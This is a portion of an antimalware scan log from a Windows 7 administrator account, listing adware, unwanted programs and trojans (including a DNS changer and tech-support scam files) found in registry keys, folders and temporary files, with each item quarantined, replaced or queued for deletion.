    PUP.Optional.TempLaunch, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Pritc, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Quarantined, [a8f7155e1c7e48ee1334a328788a669a]
    PUP.Optional.ProductSetup, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\PRODUCTSETUP|tb, 0G2O2W1R0C1R1H, Quarantined, [fca3fb78c5d50a2c339502aec83bf60a]
    PUP.Optional.SystemHealer, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\SYSTEM HEALER|CartURL, 1, Quarantined, [acf39cd7633746f0961837c67b88817f]

    Registry Data: 11
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...03&type=wbf_dnldwz_16_37&param1=1&param2=fBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D1%26bBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]DIE%26ccBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]Dca%26paBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]DWincy%26cdBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26crBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D344908437%26aBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]Dwbf_dnldwz_16_37%26os_verBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D6.1%26osBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]DWindowsGood: (www.google.com)B7Good: (www.google.com)BProfessional, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...03&type=wbf_dnldwz_16_37&param1=1&param2=fBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D1%26bBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]DIE%26ccBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]Dca%26paBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]DWincy%26cdBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26crBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D344908437%26aBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]Dwbf_dnldwz_16_37%26os_verBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D6.1%26osBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]DWindowsGood: (www.google.com)B7Good: (www.google.com)BProfessional, %4, %5
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DefaultScope, {ielnksrch}, Good: ({0633EE93-D776-472f-A0FF-E1416B8B2E3A}), Bad: ({ielnksrch}),Replaced,[e4bbabc835653bfb1f3a6e0b13f1f60a]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Page, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[acf399daf8a280b6a3be215814f04fb1]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Bar, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[257aee8518827abcb2afa6d3d62e0df3]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SearchAssistant, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[7629670c9bff181e66fbf881a2621ee2]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|Default_Search_URL, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[b9e60e65e1b98aacbaa8374232d219e7]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{847875CA-4350-447D-B3C9-2FCDA250440E}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[900f690aabef53e3f041aad0d331926e]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{89A762F9-B74D-436A-84D8-F2F7E6D9B073}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[633c94dfb5e583b36fc23e3c6b997888]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[f0af94df83173ef878b992e8f01411ef]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[a7f88fe43d5d5fd7f53cbfbb42c233cd]

    Folders: 35
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431, Quarantined, [1e8162110f8b6bcb2aa53f5de61da759],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431, Quarantined, [7d22c5aed7c3f83e04cb673534cf8779],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474227849-5810-8038-B3C04F425431, Quarantined, [4b54a2d1afebb58128a7a6f692718080],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.Linkury, C:\Windows\Temp\Smartbar, Quarantined, [1d82492acfcb57dffe1e9d57927112ee],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\index-dir, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\1f0ab4e9-4821-0, Quarantined, [87180f6493077abcecad9e290df5a45c],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\1f0ab4e9-7297-1, Quarantined, [b5eabbb89ffb43f345541fa8778bcb35],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\4f8a1888-4c51-1, Quarantined, [831c096a7f1b90a603965d6a42c048b8],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\4f8a1888-71e5-0, Quarantined, [dbc48fe4c8d2f83ee3b620a70bf75fa1],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918\2.00, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Elex, C:\ProgramData\Doubleing, Quarantined, [059a670c079363d30b36a01a3acadc24],
    PUP.Optional.LockHomepage, C:\Users\Administrator\AppData\Roaming\lockhomepage, Quarantined, [5c431162108ae3539b92dcf325df60a0],
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey, Delete-on-Reboot, [633c93e0fe9cff370daa12cc7a8a748c],
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey\update, Quarantined, [633c93e0fe9cff370daa12cc7a8a748c],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\libraries, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd, Quarantined, [0996dd969ffb76c06891c8d4b4508878],

    Files: 733
    Rogue.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.exe, Delete-on-Reboot, [9a05046f85151b1b2b9f04eb8e76ba46],
    DDoSTool.Agent, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Delete-on-Reboot, [e0bf9ed58e0c02343892308c0afac43c],
    PUP.Optional.Linkury.ACMB1, C:\ProgramData\Doubleing\IndigoString.dll, Quarantined, [445bfb78d1c959dd26a66e6b18ecaf51],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Roaming\Betastock.bin, Quarantined, [2976b3c09cfe41f54aa286d851af5ba5],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Freshdinfind.exe, Quarantined, [b3ec5320841684b2b0e346a2d43027d9],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Roaming\MedJob.bin, Quarantined, [3b644330d5c587afd21a372728d80df3],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Tipair.exe, Quarantined, [f1ae363dabef93a340539d4b32d2669a],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Triodom.exe, Quarantined, [346b7ff4bcde1125bcd719cfcb3906fa],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Roaming\True-Top.bin, Quarantined, [811ee98ab9e1072f39b3b9a52ed2fa06],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\VillaStattom.exe, Quarantined, [ebb4f3801e7cd363147fc52329dbaf51],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Koncom.exe, Quarantined, [4a55a7cc1684d0661e75a6429d67cf31],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Labin.exe, Quarantined, [7f20c3b0a2f887af2e65eff926de8d73],
    PUP.Optional.VBates.WnskRST, C:\Users\Administrator\AppData\Roaming\Gajedefsim\Wucmohhofd.dll, Quarantined, [dac5f47f108a70c6846aa03ae12030d0],
    PUP.Optional.Tuto4PC, C:\Program Files\Casterb\Uninstaller.exe, Quarantined, [fca32c47f2a8ce68207b36ba1ce84db3],
    PUP.Optional.WizzCaster, C:\Program Files\Casterb\wizzcaster.exe, Quarantined, [6e31c3b0e2b8181eb7016c64709426da],
    Adware.PennyBee, C:\Program Files\Icattib\Naacwe64.dll, Quarantined, [e1bebcb7a8f213234eb5dffbad54d927],
    Adware.PennyBee, C:\Program Files\Icattib\Xesbuhs64.dll, Quarantined, [326d0e652c6e8caae02357834db4f010],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\D7HVZHU1UW.exe, Quarantined, [643ba1d2188258debbe59353d829e11f],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\F10H5ROMJR.exe, Quarantined, [68378ce7a6f47bbb9b05c71f0ff27c84],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\NFQMP4E7QL.exe, Quarantined, [3966c1b27f1bb1850997984ee51c30d0],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\NMJA5FXU1Z.exe, Quarantined, [801f155e9bfff0460d934a9cd031659b],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\OMAX7YIRM1.exe, Quarantined, [0e913142ebaf003600a0b4320af702fe],
    PUP.Optional.EasyHotSpot, C:\Program Files (x86)\EasyHotspotb\EasyHotspot.exe, Quarantined, [643bb2c1f1a989adb9ab547edf227789],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\EasyHotspotb\idsccom_VGX.exe, Quarantined, [aef180f3f9a191a58e0d34b5f70a728e],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\EasyHotspotb\idscservice.exe, Quarantined, [1d82a8cb9bff68ceeeada44c9a6a7c84],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\EasyHotspotb\uninstaller.exe, Quarantined, [3966066daeecae8866350ee2dd27728e],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\hostb\i_network.exe, Quarantined, [891692e1c3d7b3839704638d60a4ff01],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\hostb\uninstaller.exe, Quarantined, [722d95dee3b7d363e7b427c9a06439c7],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\hostb\UninstallerCaster.exe, Quarantined, [4956b4bfb2e87db91487f8f8ac58e818],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_1bYV.exe, Quarantined, [06997af9c3d768ce9902faef50b1ef11],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_bCF4.exe, Quarantined, [207fd89bb0eacc6a7b202dbce61bd22e],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_bTAO.exe, Quarantined, [c5daf57eefab54e27f1cb13840c129d7],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_Hbn7U.exe, Quarantined, [5f406f041882a29475266e7b728f9e62],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$RUSZACG.exe, Quarantined, [f2ada0d32377261035668967b54f20e0],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$RIN85LU.exe, Quarantined, [0699ea89a6f481b5d7c41ad623e19d63],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$RYCMKER.exe, Quarantined, [4c5384ef63373006cdced31d2dd72ad6],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$R3Y9O1U.exe, Quarantined, [2a75d1a22d6df6405b407f71b74d26da],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\GMXVRMA49M.exe, Quarantined, [158aadc65248979f4e4d915fe123e818],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\UJXZFXYRJW.exe, Quarantined, [3c63e68d8d0d979f7457992f0ff547b9],
    Trojan.Agent, C:\Users\Administrator\AppData\Local\Temp\Uninstall.exe, Quarantined, [7e217ef5c5d5d561e46e407b827f20e0],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\Temp\nsbF2B8.tmp, Quarantined, [ced16d068a1064d26b01323d4db752ae],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\NSGGCKCSHQ.exe, Quarantined, [a5faf083cbcf989e623907e924e08f71],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\Temp\nsh1DCE.tmp, Quarantined, [d7c8145fa0fab086bab2de91fe06a759],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\LZNRZYLAR6.exe, Quarantined, [356a8be87129ac8a6b6be005fd0407f9],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\KFT2N0ATDM.exe, Quarantined, [435c9ad95b3fe94d1ead7b4d8b790ff1],
    Trojan.KorAd, C:\Users\Administrator\AppData\Local\Temp\KZ7ZData.7z, Quarantined, [2d72e78c21797eb8267d99447391748c],
    Rogue.TechSupportScam, C:\Users\Administrator\AppData\Local\Temp\Setup.exe, Quarantined, [bbe42251504a2b0b913aeb0426de51af],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\IED4GWN5X5.exe, Quarantined, [f9a62e452674fc3a5d3ecf2131d323dd],
    PUP.Optional.EasyHotSpot, C:\Users\Administrator\AppData\Local\Temp\IKCJH8XGY5.exe, Quarantined, [f6a9492aa4f681b5e56a2ba6778a22de],
    PUP.Optional.NoteUp, C:\Users\Administrator\AppData\Local\Temp\nsuAF49.tmp, Quarantined, [049b0370e1b9fa3cbb8174cee51cc13f],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\V3HV993T15.exe, Quarantined, [dcc394dfc7d3b77f3f8c0abec2424cb4],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\CUDP55BU9V.exe, Quarantined, [6936571ce2b85fd7f8a3797708fccc34],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\4S12IZDWBY.exe, Quarantined, [851ac1b2cad00f277823da167094d729],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\4092.tmp.exe, Quarantined, [d1ce680b801a4ee8ceb9588750b40ff1],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\1F11.tmp.exe, Quarantined, [8916442f376338fe94f3f4eb887c5ea2],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\9CD3.tmp.exe, Quarantined, [237cd79c336756e0ec9b0ad507fd52ae],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\C3E.tmp.exe, Quarantined, [653a9ad96b2f092d7a0d2eb1b450f60a],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\EC78.tmp.exe, Quarantined, [d1ce3a39e0ba0d29582fd00fb54fef11],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\5A.tmp.exe, Quarantined, [940b4c274a5053e30b7c2db221e3b64a],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\AOVEPYMA2R.exe, Quarantined, [a9f6571c2575e650e7e4b6120afa0df3],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\CAFJ5J70VJ.exe, Quarantined, [1788660d06941a1c2f9c309830d4d52b],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\E023.tmp.exe, Quarantined, [8916f47f7228e056c5c2845b8d777e82],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\6DB1.tmp.exe, Quarantined, [dcc32152d0ca9d992f58ac33a262669a],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\6DB2.tmp.exe, Quarantined, [0d92c9aa88126bcbb3d4b62918ec629e],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\D7F0.tmp.exe, Quarantined, [742bbab9801a57dfe4a3df0033d1a957],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\40B3.tmp.exe, Quarantined, [c9d6f3808b0fd75f6f18e1fe8c78ea16],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\9314.tmp.exe, Quarantined, [bde2f87b8f0b33030285627da55f2cd4],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\B67F.tmp.exe, Quarantined, [1986363d653580b63e4934ab81836799],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\D6D5.tmp.exe, Quarantined, [dec12a493d5d979ff98efbe415ef59a7],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\76FE.tmp.exe, Quarantined, [eeb1462d2f6b1422a5e213ccd0342cd4],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\76FF.tmp.exe, Quarantined, [1e813043f7a3b77f1671974840c434cc],
    PUP.Optional.Bundler, C:\Users\Administrator\AppData\Local\Temp\fsd88F.exe, Quarantined, [920d680bddbd340262715ac809f7718f],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\C6A5.tmp.exe, Quarantined, [27786d06bbdf1e18285f845b94707090],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\6DB3.tmp.exe, Quarantined, [227d03707d1d6bcbef98a43bc93b9a66],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\02985XYC0\1KE1X4KFP.exe, Quarantined, [009fb8bb44563cfa9308ed0310f4bc44],
    Trojan.KorAd, C:\Users\Administrator\AppData\Local\Temp\06784\KuaiZip_Setup_long_1.exe, Quarantined, [e3bc4d264d4d290da8fbf1ec6d97ff01],
    PUP.Optional.PennyBee, C:\Users\Administrator\AppData\Local\Temp\TJ8BG7P20\TJ8BG7P20.exe, Quarantined, [514eadc606948ea832ee88ef5ea347b9],
    PUP.Optional.PCSpeedUp, C:\Users\Administrator\AppData\Local\Temp\LC9256M0I\Y1FHD6S1I.exe, Quarantined, [a0ff9fd45a402e08e3fbce5ef20f22de],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\NX5ESLKUM\NX5ESLKUM.exe, Quarantined, [18877003bcde3afcbcdf21cf50b412ee],
    Trojan.Downloader, C:\Users\Administrator\AppData\Local\Temp\install_tmp5\inter_mode_323.exe, Quarantined, [851a94df8a109b9bf5583c3f55acef11],
    Trojan.Downloader, C:\Users\Administrator\AppData\Local\Temp\install_tmp8\inter_mode_323.exe, Quarantined, [c8d7a4cfc2d8ea4c08454536ac55c937],
    PUP.Optional.TechAgent, C:\Users\Administrator\AppData\Local\Temp\install_tmp9\thsetup.exe, Quarantined, [aff0264d9dfdcc6ad8cfd30a88793bc5],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\KAW413BJ8\REKQ17732.exe, Quarantined, [e7b8126185153006811a648ccc38f10f],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\V63SOMYVIS\advise.exe, Quarantined, [6936f57e0a908aac3f5cb43c699b33cd],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Local\Temp\QX3K6XCML\QX3K6XCML.exe, Quarantined, [0c93680bc3d72e08444fffe91de76997],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Local\Temp\RarSFX1\LogicHandler.exe, Quarantined, [178875fe9505072f24c87de105fbb24e],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\IA3D9C58Q\IA3D9C58Q.exe, Quarantined, [7d225d166a308fa73a6105eb8282b44c],
    PUP.Optional.SystemHealer, C:\Users\Administrator\AppData\Local\Temp\install_tmp2\SystemHealer.exe, Quarantined, [ddc2b2c1e9b10333e515cc9504fd619f],
    PUP.Optional.TechAgent, C:\Users\Administrator\AppData\Local\Temp\install_tmp3\thsetup.exe, Quarantined, [920d254e306a47efc5e2835a47baf907],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\XRKY0D7CAD\advance.exe, Quarantined, [326ddc97603a55e124771ad629dbae52],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\XRKY0D7CAD\win.exe, Quarantined, [eeb1acc75d3d0432e89ba69b57a9ab55],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\E9YEJEM81\E9YEJEM81.exe, Quarantined, [1689a8cb46543ef80497f6fa43c14eb2],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\DZQXSB5RH1\advise.exe, Quarantined, [2d727cf704967eb85e3d0be5c14357a9],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\34NBZTE26\34NBZTE26.exe, Quarantined, [4b54bab95c3eea4c2b7018d826debf41],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\1NGK2MJI3M\weapprise.exe, Quarantined, [2b74492ab3e74cea92094ea29470817f],
    Trojan.Agent, C:\Users\Administrator\AppData\Local\Temp\4OJE1SW9V\4OJE1SW9V.exe, Quarantined, [ddc2a6cd900a74c26f65eae2c24224dc],
